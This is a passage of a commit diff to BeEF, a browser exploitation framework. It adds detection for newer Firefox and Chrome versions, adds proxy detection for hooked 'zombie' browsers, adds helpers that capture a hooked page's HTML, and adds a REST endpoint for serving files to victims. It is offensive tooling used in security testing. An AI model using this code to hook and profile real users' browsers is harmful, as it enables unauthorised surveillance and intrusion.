Add support for Firefox 25

Module Update: lcamtuf Download

Gemfile

@@ -16,7 +16,11 @@ gem "thin"
 gem "sinatra", "1.4.2"
 gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
+gem "uglifier", "~> 2.2.1"
+# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
+if !RUBY_PLATFORM.downcase.include?("darwin")
+  gem "therubyracer", "~> 0.12.0"
+end
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -27,6 +31,7 @@ gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
+gem "rubyzip", "~> 1.0.0"
 
 # notifications
 gem "twitter"

README.mkd

@@ -72,3 +72,6 @@ To get started, simply execute beef and follow the instructions:
 
        $ ./beef
 
+On windows use
+
+      $ ruby beef

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.6-alpha
+0.4.4.8-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.6-alpha'
+    version: '0.4.4.8-alpha'
     debug: false
 
     restrictions:
@@ -30,7 +30,7 @@ beef:
         # DNS
         dns_host: "localhost"
         dns_port: 53
-        panel_path: "/ui/panel"
+        web_ui_basepath: "/ui"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
@@ -44,7 +44,7 @@ beef:
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second

core/bootstrap.rb

@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
+require 'core/main/rest/handlers/server'
 require 'core/main/rest/api'
 
 ## @note Include Websocket

core/core.rb

@@ -37,4 +37,7 @@ require 'core/main/migration'
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 
+# @note Include rubyzip lib
+require 'zip'
+
 

core/main/client/browser.js

@@ -257,7 +257,39 @@ beef.browser = {
      * @example: beef.browser.isFF21()
      */
     isFF21:function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
+    /**
+     * Returns true if FF22
+     * @example: beef.browser.isFF22()
+     */
+    isFF22:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
+    },
+
+    /**
+     * Returns true if FF23
+     * @example: beef.browser.isFF23()
+     */
+    isFF23:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
+    },
+
+    /**
+     * Returns true if FF24
+     * @example: beef.browser.isFF24()
+     */
+    isFF24:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
+    },
+
+    /**
+     * Returns true if FF25
+     * @example: beef.browser.isFF25()
+     */
+    isFF25:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
     },
 
     /**
@@ -265,7 +297,7 @@ beef.browser = {
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25();
     },
 
     /**
@@ -572,12 +604,44 @@ beef.browser = {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 29.
+     * @example: beef.browser.isC29()
+     */
+    isC29:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 29.
+     * @example: beef.browser.isC29iOS()
+     */
+    isC29iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 30.
+     * @example: beef.browser.isC30()
+     */
+    isC30:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 30.
+     * @example: beef.browser.isC30iOS()
+     */
+    isC30iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS();
     },
 
     /**
@@ -671,6 +735,10 @@ beef.browser = {
             C27iOS:this.isC27iOS(), // Chrome 27 on iOS
             C28:this.isC28(), // Chrome 28
             C28iOS:this.isC28iOS(), // Chrome 28 on iOS
+            C29:this.isC29(), // Chrome 29
+            C29iOS:this.isC29iOS(), // Chrome 29 on iOS
+            C30:this.isC30(), // Chrome 30 
+            C30iOS:this.isC30iOS(), // Chrome 30 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -695,6 +763,10 @@ beef.browser = {
             FF19:this.isFF19(), // Firefox 19
             FF20:this.isFF20(), // Firefox 20
             FF21:this.isFF21(), // Firefox 21
+            FF22:this.isFF22(), // Firefox 22
+            FF23:this.isFF23(), // Firefox 23
+            FF24:this.isFF24(), // Firefox 24
+            FF25:this.isFF25(), // Firefox 25
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -862,6 +934,22 @@ beef.browser = {
             return '28'
         }
         ;   // Chrome 28 for iOS
+        if (this.isC29()) {
+            return '29'
+        }
+        ;    // Chrome 29
+        if (this.isC29iOS()) {
+            return '29'
+        }
+        ;   // Chrome 29 for iOS
+        if (this.isC30()) {
+            return '30'
+        }
+        ;    // Chrome 30
+        if (this.isC30iOS()) {
+            return '30'
+        }
+        ;   // Chrome 30 for iOS
         if (this.isFF2()) {
             return '2'
         }
@@ -950,6 +1038,22 @@ beef.browser = {
             return '21'
         }
         ;    // Firefox 21
+        if (this.isFF22()) {
+            return '22'
+        }
+        ;   // Firefox 22
+        if (this.isFF23()) {
+            return '23'
+        }
+        ;   // Firefox 23
+        if (this.isFF24()) {
+            return '24'
+        }
+        ;   // Firefox 24
+        if (this.isFF25()) {
+            return '25'
+        }
+        ;   // Firefox 25
 
         if (this.isIE6()) {
             return '6'
@@ -1059,7 +1163,7 @@ beef.browser = {
                 beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                beef.debug("Hooking frame failed");
+                beef.debug("Hooking child frame failed: "+e.message);
             }
         }
     },
@@ -1074,7 +1178,7 @@ beef.browser = {
         if (!this.type().IE) {
             return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
         } else {
-            flash_versions = 11;
+            flash_versions = 12;
             flash_installed = false;
 
             if (window.ActiveXObject) {
@@ -1086,10 +1190,10 @@ beef.browser = {
                         }
                     }
                     catch (e) {
+                        beef.debug("Creating Flash ActiveX object failed: "+e.message);
                     }
                 }
             }
-            ;
             return flash_installed;
         }
     },
@@ -1115,7 +1219,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
             try {
@@ -1123,6 +1227,7 @@ beef.browser = {
                 var qt_test = new ActiveXObject('QuickTime.QuickTime');
 
             } catch (e) {
+                beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
             }
 
             if (qt_test) {
@@ -1135,7 +1240,7 @@ beef.browser = {
 
     },
 
-	/**
+    /**
      * Checks if the zombie has the RealPlayer plugin installed.
      * @return: {Boolean} true or false.
      *
@@ -1156,30 +1261,30 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
-			var definedControls = [
-			    'RealPlayer',
-				'rmocx.RealPlayer G2 Control',
-			    'rmocx.RealPlayer G2 Control.1',
-			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
-			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
-				];
+            var definedControls = [
+              'RealPlayer',
+              'rmocx.RealPlayer G2 Control',
+              'rmocx.RealPlayer G2 Control.1',
+              'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
+              'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
+            ];
 
-			for (var i = 0; i < definedControls.length; i++) {
+            for (var i = 0; i < definedControls.length; i++) {
 
             	try {
-
-                	var rp_test = new ActiveXObject(definedControls[i]);
-
+                    var rp_test = new ActiveXObject(definedControls[i]);
             	} catch (e) {
+                    beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
             	}
 
-            	if ( rp_test ) {
-                	realplayer = true;
-            	}
-			}
+                if ( rp_test ) {
+                    realplayer = true;
+            	
+                }
+            }
         }
 
         return realplayer;
@@ -1215,6 +1320,7 @@ beef.browser = {
 	            var wmp_test = new ActiveXObject('WMPlayer.OCX');
 
 	        } catch (e) {
+                    beef.debug("Creating WMP ActiveX object failed: "+e.message);
 	        }
 
 	        if (wmp_test) {
@@ -1243,10 +1349,11 @@ beef.browser = {
             try {
                 control = new ActiveXObject("VideoLAN.VLCPlugin.2");
                 vlc = true ;
-                } catch(e) {
-                }
-        };
-        return vlc ;
+            } catch(e) {
+                    beef.debug("Creating VLC ActiveX object failed: "+e.message);
+            }
+        }
+        return vlc;
     },
 
     /**
@@ -1256,7 +1363,14 @@ beef.browser = {
      * @example: if(beef.browser.javaEnabled()) { ... }
      */
     javaEnabled:function () {
-        return false;
+        //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
+        // versionJRE = deployJava.getJREs();
+
+        // if(versionJRE != '')
+        //     return true;
+        //  else
+            return false;
+
     },
 
     /**
@@ -1300,33 +1414,8 @@ beef.browser = {
      */
     hasJava:function () {
 
-        // Check if Java is enabled
-        if (!beef.browser.javaEnabled()) {
-            return false;
-        }
+        return beef.browser.javaEnabled();
 
-        // This is a temporary fix as this does not work on Safari and Chrome
-        // Chrome requires manual user intervention even with unsigned applets.
-        // Safari requires a few seconds to load the applet.
-        if (beef.browser.isC() || beef.browser.isS()) {
-            return true;
-        }
-
-        // Inject an unsigned java applet to double check if the Java
-        // plugin is working fine.
-        try {
-            var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
-            var applet_id = 'checkJava';
-            var applet_name = 'checkJava';
-            var output;
-            beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
-                null, applet_archive, null);
-            output = document.Microsoft_Corporation.getInfo();
-            beef.dom.detachApplet('checkJava');
-            return output = 1;
-        } catch (e) {
-            return false;
-        }
     },
 
     /**
@@ -1655,7 +1744,6 @@ beef.browser = {
         });
         var screen_size      = beef.browser.getScreenSize();
         var window_size      = beef.browser.getWindowSize();
-        var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
         var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
         var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
         var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
@@ -1667,7 +1755,6 @@ beef.browser = {
         var has_quicktime    = (beef.browser.hasQuickTime()) ?    "Yes" : "No";
         var has_realplayer   = (beef.browser.hasRealPlayer()) ?   "Yes" : "No";
         var has_wmp          = (beef.browser.hasWMP()) ?          "Yes" : "No"; 
-        var has_vlc          = (beef.browser.hasVLC()) ?          "Yes" : "No";
         var has_foxit        = (beef.browser.hasFoxit()) ?        "Yes" : "No";
         try{
             var cookies = document.cookie;
@@ -1702,7 +1789,6 @@ beef.browser = {
         if (browser_type) details['BrowserType'] = browser_type;
         if (screen_size) details['ScreenSize'] = screen_size;
         if (window_size) details['WindowSize'] = window_size;
-        if (java_enabled) details['JavaEnabled'] = java_enabled;
         if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
         if (has_flash) details['HasFlash'] = has_flash;
         if (has_phonegap) details['HasPhonegap'] = has_phonegap;
@@ -1714,7 +1800,6 @@ beef.browser = {
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
         if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
         if (has_wmp) details['HasWMP'] = has_wmp;
-        if (has_vlc) details['HasVLC'] = has_vlc;
         if (has_foxit) details['HasFoxit'] = has_foxit;
 
         return details;
@@ -1863,6 +1948,30 @@ beef.browser = {
         return foxitplugin;
     },
 
+    /**
+     * Returns the page head HTML
+     **/ 
+    getPageHead:function () {
+      var html_head;
+      try {
+        html_head = document.head.innerHTML.toString();
+      } catch (e) {
+      }
+      return html_head;
+    },
+
+    /**
+     * Returns the page body HTML
+     **/
+    getPageBody:function() {
+      var html_body;
+      try {
+        html_body = document.body.innerHTML.toString();
+      } catch (e) {
+      }
+      return html_body;
+    },
+
     /**
      * Dynamically changes the favicon: works in Firefox, Chrome and Opera
      **/

core/main/client/dom.js

@@ -384,7 +384,8 @@ beef.dom = {
 
             if (codebase != null) {
                 content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
+            if (archive != null){
                 content += "<param name='archive' value='" + archive + "' />";
             }
             if (params != null) {

core/main/console/banners.rb

@@ -86,7 +86,7 @@ module Banners
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
         data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
         
         print_more data
       end

core/main/handlers/browserdetails.rb

@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -199,14 +250,6 @@ module BeEF
             self.err_msg "Invalid window size returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for JavaEnabled
-          java_enabled = get_param(@data['results'], 'JavaEnabled')
-          if BeEF::Filters.is_valid_yes_no?(java_enabled)
-            BD.set(session_id, 'JavaEnabled', java_enabled)
-          else
-            self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
-          end
-
           # get and store the yes|no value for VBScriptEnabled
           vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
           if  BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -303,14 +346,6 @@ module BeEF
             self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for HasVLC
-          has_vlc = get_param(@data['results'], 'HasVLC')
-          if BeEF::Filters.is_valid_yes_no?(has_vlc)
-            BD.set(session_id, 'HasVLC', has_vlc)
-          else
-            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
-          end
-
           # get and store the value for CPU
           cpu_type = get_param(@data['results'], 'CPU')
           if !cpu_type.nil?

core/main/rest/api.rb

@@ -37,12 +37,19 @@ module BeEF
         end
       end
 
+      module RegisterServerHandler
+        def self.mount_handler(server)
+          server.mount('/api/server', BeEF::Core::Rest::Server.new)
+        end
+      end
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
 
       #
       # Check the source IP is within the permitted subnet

core/main/rest/handlers/server.rb

@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Server < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+        http_server = BeEF::Core::Server.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+
+        # @note Binds a local file to a specified path in BeEF's web server
+        post '/bind' do
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            mount = data['mount']
+            local_file = data['local_file']
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
+            status 200
+          rescue Exception => e
+            error 400
+          end
+        end
+      end
+    end
+  end
+end

core/main/router/router.rb

@@ -114,6 +114,7 @@ module BeEF
         # @note Default root page
         get "/" do
           if config.get("beef.http.web_server_imitation.enable")
+            bp = config.get "beef.http.web_ui_basepath"
             type = config.get("beef.http.web_server_imitation.type")
             case type
               when "apache"
@@ -209,7 +210,7 @@ module BeEF
                     "<h2>If you are the website administrator:</h2>" +
                     "<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
                     "<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>" +
-                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
+                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
                     "</div>" +
                     "</div>" +
                     "</div>" +
@@ -234,7 +235,7 @@ module BeEF
                     "<table>" +
                     "<tr>" +
                     "<td ID=tableProps width=70 valign=top align=center>" +
-                    "<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
+                    "<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
                     "<td ID=tablePropsWidth width=400>" +
                     "<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
                     "<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +

core/main/server.rb

@@ -22,9 +22,10 @@ module BeEF
 
       def initialize
         @configuration = BeEF::Core::Configuration.instance
+        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
         beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
         beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "http://#{beef_host}:#{beef_port}"
+        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
         @root_dir = File.expand_path('../../../', __FILE__)
         @command_urls = {}
         @mounts = {}

extensions/admin_ui/api/handler.rb

@@ -12,40 +12,90 @@ module API
   # We use this module to register all the http handler for the Administrator UI
   #
   module Handler
-    
+    require 'uglifier'
+
     BeEF::API::Registrar.instance.register(BeEF::Extension::AdminUI::API::Handler, BeEF::API::Server, 'mount_handler')
-    
+
+    def self.evaluate_and_minify(content, params, name)
+      erubis = Erubis::FastEruby.new(content)
+      evaluated = erubis.evaluate(params)
+      minified = Uglifier.compile(evaluated)
+      write_to = File.new("#{File.dirname(__FILE__)}/../media/javascript-min/#{name}.js", "w+")
+      File.open(write_to, 'w') { |file| file.write(minified) }
+
+      File.path write_to
+    end
+
+    def self.build_javascript_ui(beef_server)
+      auth_js_file = File.read(File.dirname(__FILE__)+'/../media/javascript/ui/authentication.js') + "\n\n"
+      js_files = ""
+
+      #NOTE: order counts! make sure you know what you're doing if you add files
+      esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
+      ux =  %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
+      panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js)
+
+      global_js = esapi + ux + panel
+
+      global_js.each do |file|
+        js_files << File.read(File.dirname(__FILE__)+'/../media/javascript/'+file) + "\n\n"
+      end
+
+      config = BeEF::Core::Configuration.instance
+      bp = config.get "beef.http.web_ui_basepath"
+
+      # if more dynamic variables are needed in JavaScript files
+      # add them here in the following Hash
+      params = {
+       'base_path' => bp
+      }
+
+      # process all JavaScript files, evaluating them with Erubis
+      web_ui_all = self.evaluate_and_minify(js_files, params, 'web_ui_all')
+      web_ui_auth = self.evaluate_and_minify(auth_js_file, params, 'web_ui_auth')
+
+      beef_server.mount("#{bp}/web_ui_all.js", Rack::File.new(web_ui_all))
+      beef_server.mount("#{bp}/web_ui_auth.js", Rack::File.new(web_ui_auth))
+
+    end
+
     #
     # This function gets called automatically by the server.
     #
     def self.mount_handler(beef_server)
-      # retrieve the configuration class instance
-      configuration = BeEF::Core::Configuration.instance
-      
+      config = BeEF::Core::Configuration.instance
+
+      # Web UI base path, like http://beef_domain/<bp>/panel
+      bp = config.get "beef.http.web_ui_basepath"
+
       # registers the http controllers used by BeEF core (authentication, logs, modules and panel)
       Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
-        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+        beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
       end
 
       # registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..)
       Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
-        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+        beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
       end
       
       # mount the folder were we store static files (javascript, css, images) for the admin ui
       media_dir = File.dirname(__FILE__)+'/../media/'
-      beef_server.mount('/ui/media', Rack::File.new(media_dir))
+      beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
 
       
       # mount the favicon file, if we're not imitating a web server.
-      if !configuration.get("beef.http.web_server_imitation.enable")
-        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
+      if !config.get("beef.http.web_server_imitation.enable")
+        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}"))
       end
+
+      self.build_javascript_ui beef_server
     end
+
+
     
   end
   

extensions/admin_ui/classes/httpcontroller.rb

@@ -40,8 +40,12 @@ module AdminUI
     def run(request, response)
       @request = request
       @params = request.params
-      @session = BeEF::Extension::AdminUI::Session.instance      
-      auth_url = '/ui/authentication'
+      @session = BeEF::Extension::AdminUI::Session.instance
